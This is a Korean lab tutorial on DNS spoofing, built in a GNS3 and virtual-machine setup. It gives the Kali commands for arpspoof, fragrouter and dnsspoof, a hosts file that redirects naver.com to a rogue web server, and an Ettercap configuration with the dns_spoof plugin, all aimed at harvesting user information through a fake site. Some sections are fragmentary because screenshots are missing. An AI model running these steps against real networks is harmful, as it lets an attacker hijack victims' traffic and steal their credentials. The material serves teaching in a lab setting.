DNS Spoofing

DNS Spoofing이란? 

클라이언트가 이름 질의를 할 때,  DNS 서버보다 앞서 응답 하여 공격자가 의도한 대로 IP정보를 알려주는 공격 방법을 말한다.

 

1. DNS 취약점 

1) DNS는 UDP 기반이므로 인증하지 않는다 

2) Query시 인증을 수행하지 않는다 

3) 공격자가 local에 존재하므로 실제 dns 서버보다 빠르게 응답할 수 있다 

4) 클라이언트는 dns query를 수행한 후 먼저 응답한 ip를 수용한다 

2. DNS Spoofing Attack 종류 

1)공격자는 DNS Query를 Sniffing해야한다. Transaction ID, 사용된 local Port, Name server address 등 정보를 알아야 하므로 주로 local에서 공격함 

2) DNS Cache Poisoning은 dns와 비슷한 공격기법으로 공격대상이 클라이언트가 아닌 DNS서버가 대상이되며, dns 서버의 cache를 조작하는 공격기법 

3. DNS Name Query 순서 

 

 

4. 공격방법 

 

시나리오는 중간에서 attacker가 DNs Query를 받아서 DNS Reply를 날려준다 

Client가 접속하는 홈페이지를 demo server를 만들어서 가상 웹 서버로 접속하게 한후 사용자 정보를 얻어온다 

공격순서  

1)port listening  

2) forwarding (web server, backtrack에서도 가능) 

3) arp spoofing 

4) dns spoof 할 파일 생성 

5) dns spoof -f 파일명 

 

 

GNS3 1.4.5 / 3745 / 일반스위치

GNS3 2.0.3 / i86bi-linux-l3-adventerprisek9-15.4.1T.bin / i86bi-linux-l2-adventerprisek9-15.2c.bin

 

 

 

 

 

실험 환경 

Role	IP	DNS	OS	Version	VMnet	Connect
WEB Client	10.1.4.1/24	8.8.8.8	WIN 7	SP1
Attacker	10.1.4.2/24	8.8.8.8	Kali	2.0
Rogue WEB Server	10.1.5.200/24	8.8.8.8	WIN 2012	R2

 

NAT Rotuer

enable hostname NAT ! enable secret ciscosec ! no ip domain lookup ! username root password 0 toor ! interface Ethernet0/1  ip address dhcp  ip nat outside  no shutdown ! interface Ethernet0/2  ip address 10.1.4.254 255.255.255.0  ip nat inside  no shutdown ! interface Ethernet0/3  ip address 10.1.5.254 255.255.255.0  ip nat inside  no shutdown ! ip nat inside source list 1 interface Ethernet0/1 overload ! access-list 1 permit 10.1.4.0 0.0.0.255 access-list 1 permit 10.1.5.0 0.0.0.255 ! end

 

 

WEB Client

 

Rogue WEB Server

 

Kali  IP address

root@kali:~# ip addr add 10.1.4.2/24 dev eth0 root@kali:~# route add default gw 10.1.4.254

 

Kali - hosts  파일 생성

# cd /tmp cat > /tmp/hosts 10.1.5.200  www.naver.com 10.1.5.200  naver.com

 

Kali - ARP Spoofing

root@kali:~# nmap -Pn 10.1.4.0/24   root@kali:~# arpspoof -i eth0 -t 10.1.4.1 10.1.4.254

 

Kali - New terminal - fragrouter  실행

root@kali:~# fragrouter -B1

 

 

Kali - New terminal - dnsspoofing  실행

root@kali:~# dnsspoof -i eth0 -f /tmp/hosts

 

 

 5. 공격자 시스템(Kali) 에서 Apache2 서버 시작 및 해킹 홈피 만들기 

 

 

  

6. 피해자 시스템에서 캐시 테이블 지우기 

3. 
   

4. 7. 웹 페이지 열기 

4. 
   

 

Kali

root@kali:/tmp# dnsspoof -i eth0 -f hosts dnsspoof: listening on eth0 [udp dst port 53 and not src 10.1.4.2] 10.1.4.1.64376 > 8.8.8.8.53:  9996+ A? www.naver.com 10.1.4.1.64792 > 10.1.4.2.53:  2+ A? www.naver.com

 

=============================

Ettercap 을 이용한 DNS spoofing

=============================

/etc/ettercap/etter.conf 편집

Do add two lines at privis section. [privs] #ec_uid = 65534                # nobody is the default #ec_uid = 65534                # nobody is the default ec_gid = 0              # nobody is the default ec_gid = 0                # nobody is the default Do remove hash marks. # if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Add hostname to ip

root@kali:~# vi /etc/ettercap/etter.dns   naver.com       A       10.1.5.200 www.naver.com   A       10.1.5.200 *.naver.com     A       10.1.5.200

 

Do execute the applicaton ettercap.

root@kali:~# ettercap -G

 

Choose the interface for sniffing

 

Do scan hosts in network

 

Do show scanned hosts

 

Do select follow numbers. Number 1,2 and 3,4

 

Do execute an ARP spoofing

 

Check optional parameters

 

Select Manage the plugins in Plugins

 

Double click the dns_snoof

 

Web client(Victim) ; verify arp cache table

 

Do flush host cache table

 

 

Connect naver site.

 

We can see the facked website.